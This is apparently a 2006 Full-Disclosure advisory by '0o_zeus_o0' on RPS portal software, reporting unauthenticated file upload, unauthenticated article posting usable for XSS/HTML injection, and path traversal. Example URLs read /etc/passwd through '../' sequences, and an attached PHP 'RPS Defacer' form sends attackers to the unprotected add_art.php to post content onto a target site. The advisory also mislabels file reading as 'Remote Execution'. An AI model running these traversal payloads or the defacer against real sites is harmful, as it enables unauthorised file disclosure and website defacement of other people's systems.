###########################################################################
# Advisory #13 Title: Multiple Vulnerabilities RPS (rigter portal system)
#
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus at diosdelared.com
# Website: www.elitemexico.org
# Date: 18/07/06
# Risk: medium
# Vendor Url: http://rps.rigtersir.com/
# Affected Software: RPS
# Non Affected: RPS V 4
#
#Info:
##################################################################
#UPLOAD FILES
# it allows the user to raise archives without having administration
privileges
#
#
#SQL inyección
#it allows the user to insert post without having to be admin with this can
make xss or
#HTML injection
#
#
#example of upload files
##################################################################
#
#http://www.vuln.com/[path]/adm/photos/images.php
#
#http://www.vuln.com/[path]//adm/down/files.php
#
##################################################################
#example Remote Execution
##################################################################
#
#http://www.vuln.com/[path]/index.php?id=../../../../../etc/passwd
#
#http://www.vuln.com/[path]/index.php?id=../../../home/victim/public_html/index
#
##################################################################
#
#Solution:
##################################################################
#
#
#VULNERABLE VERSIONS
##################################################################
# v1.0, 2.0 3.0
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus at diosdelared.com
#www.elitemexico.org
##################################################################
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
#
#Original Advisory: http://zeus.pccentervillaflores.com//13.txt
##################################################################
SQL inyección in "Articulos" exploit
<?php
/*
RPS Defacer by: 0o_ZEUS_o0 OliMpusKlaN •~ FX ~•
Date: 08/01/06
Website: www.elitemexico.org
*/
?>
<html>
<head>
<title>RPS Defacer</title>
</head>
<body text="#FFFFFF" bgcolor="#000000">
<p align="center"><font face="Verdana" size="2"><b><u><font
color="#FF0000">RPS Defacer<br>
<br>
</font>
</u><font color="#FF0000">0o_ZEUS_o0 OliMpusKlaN <br /> •~ FX
~•</font></b></font></p>
<form method="POST" ACTION="?action=enviar" name="rps_defacer">
<center>
<table border="0" cellpadding="5" cellspacing="0"
style="border-collapse: collapse" width="40%">
<tr>
<td width="100%"><b><font face="Verdana" size="1">Direccion:<br>
<input type="text" name="url" size="30"
value="http://"></font></b></td>
</tr>
<tr>
<td width="100%"><b><font size="1" face="Verdana">Autor:<br>
<input type="text" name="autor" size="20"></font></b></td>
</tr>
<tr>
<td width="100%"><b><font face="Verdana"><font size="1">Email:<br>
<input type="text" name="email" size="20"></font></font></b></td>
</tr>
<tr>
<td width="100%"><b><font size="1" face="Verdana">Titulo:<br>
<input type="text" name="titulo" size="30"></font></b></td>
</tr>
<tr>
<td width="100%"><b><font size="1" face="Verdana">Contenido:
(Soporta
HTML Inyection)<br>
<textarea rows="13" name="articulo"
cols="55"></textarea></font></b></td>
</tr>
<tr>
<td width="100%">
<p align="center"><b><font face="Verdana" size="1">
<input type="submit" value="Enviar" name="send">
<input type="reset" value="Restablecer"
name="delete"></font></b></td>
</tr>
</table>
</center>
</div>
</form>
<?
if($action=="enviar"){
$web= $_POST['url'];
echo "<script LANGUAGE="JavaScript">
var pagina="$web/adm/add_art.php"
function redireccionar()
{
location.href=pagina
}
setTimeout ("redireccionar()", 0001);
</script>";
}
?>
</body>
</html>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060718/6a70b9b5/attachment.html
